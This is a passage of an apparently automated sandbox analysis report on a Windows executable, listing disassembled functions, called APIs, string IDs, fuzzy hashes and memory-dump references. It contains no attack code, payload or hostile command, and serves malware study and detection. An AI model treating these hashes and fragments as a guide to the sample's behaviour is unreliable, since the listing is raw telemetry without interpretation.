                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 444109036-1018135373
                                                                                                                                                                                                      • Opcode ID: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
                                                                                                                                                                                                      • Instruction ID: a07aa9fd2487b20efdeb74e9701057ec17aca8a4734c00c9016a856a313bf8e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c62ae0bd6f598e5530dee3ab7a169ccc6f3387c11d68efdd1ef4d3d9c7f7e50
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A65150FA71874286E620EF69E44926D7BA4FB89BA0F140535DB8D07B55DF3CE460CB04
                                                                                                                                                                                                      Function 00007FFBBCD499AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                      • API String ID: 1333004437-2891890143
                                                                                                                                                                                                      • Opcode ID: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
                                                                                                                                                                                                      • Instruction ID: 4e6fd124b2f2a7a5218ff2b9ba7cbe556c2964a6a400605ba9910f86aa1c5b15
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96db185dee724ff1af179d5801cdaf6ae824addfb7b5e3897bc050de27ca576d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B431D6E5B08B8685FA11DB7AE8991BA7364FF45780F444132EB5E53395DE3CE502C708
                                                                                                                                                                                                      Function 00007FF7FF587E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7FF58352C,?,00000000,00007FF7FF583F23), ref: 00007FF7FF587F22
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateDirectory
                                                                                                                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                                                                                                                      • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                      • Instruction ID: 32be83ce6d4a459b06ada111c58a9cbcabf97a4ca1fea3de9b4d79cda10e9477
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D531B061619AC145EB21AB21F8507EAA354FF88BE4F840331EE7D47BC9EE2CD645C790
                                                                                                                                                                                                      Function 00007FF7FF582810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 2030045667-255084403
                                                                                                                                                                                                      • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction ID: cd390d2fd8c64561ad633427d078f8982fb251811455d2cae1e41af6ac5b484e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA21E572708B8192E710AB14F8447EAB7A0FB88780F800232EEAD537A5DF3CD255C790
                                                                                                                                                                                                      Function 00007FFBBCD410F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD4112E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abortterminate
                                                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                                                      • API String ID: 661698970-2671469338
                                                                                                                                                                                                      • Opcode ID: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                      • Instruction ID: 554f642da4ab28a5db7cb3dd76db8d78241d499f195cd5c159895385abe14e0d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF04FFAB18606C2E7509FB9E18A07C3764FB48F40F095132D7480625ADF3CD490C705
                                                                                                                                                                                                      Function 00007FFBBB6118BC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_AsUnsignedLongLong.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6118C9
                                                                                                                                                                                                      • PyErr_Occurred.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6118D2
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,00000006,00007FFBBB61075D), ref: 00007FFBBB6159A9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Long$Long_OccurredStringUnsigned
                                                                                                                                                                                                      • String ID: Value too large for uint32_t type
                                                                                                                                                                                                      • API String ID: 944333170-1712686559
                                                                                                                                                                                                      • Opcode ID: 8ac7a20ae80ccca81888b0cc09755ddc2b0cb9c17cfce0893e9d75e9ca9ceff1
                                                                                                                                                                                                      • Instruction ID: a0aae4c030610f494001faa2497532e16ab460ee97a78d6992e7791c46e7d6b9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac7a20ae80ccca81888b0cc09755ddc2b0cb9c17cfce0893e9d75e9ca9ceff1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F0B2A1B1864385EA549B39E884178B3A0BB48B84B18E434DB1F46265DE3CEC559308
                                                                                                                                                                                                      Function 00007FFBBB615DD4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Long$Long_OccurredStringUnsigned
                                                                                                                                                                                                      • String ID: Value too large for lzma_mode type
                                                                                                                                                                                                      • API String ID: 944333170-1290617251
                                                                                                                                                                                                      • Opcode ID: f90cae6687b7eaa245f2c34b10f9a5b2d7e4aa1b650dbb0da9f8c22bb116e6df
                                                                                                                                                                                                      • Instruction ID: 0ec5f7d11e039eb66e786921364c6d0dcd7d23a701c8aa34b9468ec19e760e97
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f90cae6687b7eaa245f2c34b10f9a5b2d7e4aa1b650dbb0da9f8c22bb116e6df
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F0DAA5E1964382EA548F39F884134F3A0BF48B84F58E435DB0F46264CE3CEC568308
                                                                                                                                                                                                      Function 00007FFBBB615D7C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Long$Long_OccurredStringUnsigned
                                                                                                                                                                                                      • String ID: Value too large for lzma_match_finder type
                                                                                                                                                                                                      • API String ID: 944333170-1161044407
                                                                                                                                                                                                      • Opcode ID: 01b0d04b65a256c979aae82caa2847c0d8423915d3bc3bd068b60acce2f2a1cf
                                                                                                                                                                                                      • Instruction ID: e3d9be6fa768cd217569432b046234ccaef4de3e1826c3b0f25d38ff3fec293a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01b0d04b65a256c979aae82caa2847c0d8423915d3bc3bd068b60acce2f2a1cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0D4A1B1964282EA548F39F888138F3A0BF48B84F18A434EB4F46274DE3CEC558308
                                                                                                                                                                                                      Function 00007FF7FF59C610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction ID: 524178aa164c67a5b5d14dcd063152a926598bebfe668d04ac25221016ce5405
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D102B2B18AC28AE724DF64D4441EC7771FB44798B848225DE7D97BD9DE38D016C390
                                                                                                                                                                                                      Function 00007FF7FF59CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D0EC
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D177
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                      • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction ID: cef920b1496819e1980775ef83826ecafb258c76f2f942745081a0b4e0fbf0dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2591E732F1869285F774AF6594402FDABA0BB40788F944235DE7E536D4EE3CD442C7A0
                                                                                                                                                                                                      Function 00007FFBBCD48EC8 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                      • Instruction ID: dce35f53510821166d8e8d3abb230a172c564d6cc6b6276a234d94c9bba7d76f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4917CEAF08A92C9FB10CB79D8883BC37A1BB04788F544036DB5D67694DF79A846C344
                                                                                                                                                                                                      Function 00007FF7FF59F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction ID: 6d9a180b653529e0fa2ef35c5871fd47761ea4722ef20f83899a1128368b7108
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651F872F0819186FB28EF2499556FCA7A2AB00358F914335DE3E53AE5DF38E401C790
                                                                                                                                                                                                      Function 00007FF7FF5957EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                      • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction ID: c66ffc659509a44edf585ef93c600a7054aa9cfe150748ff6a9b4cafb3a9e980
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51BF22E086818AFB28EF71D4503FDA3E1AB44B58F948635DE2D476C9DF38D460C3A0
                                                                                                                                                                                                      Function 00007FFBBCD4BB04 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                      • Instruction ID: 76aff433f5fdfb286c9ed7dda517efc29781528c75e95f0c21c6f8c121aff8d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 084166FAB08B8499EB01CFB8C8483AC37A0FB58B48F588125CB4D6B749DF789841C754
                                                                                                                                                                                                      Function 00007FF7FF5820C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1956198572-0
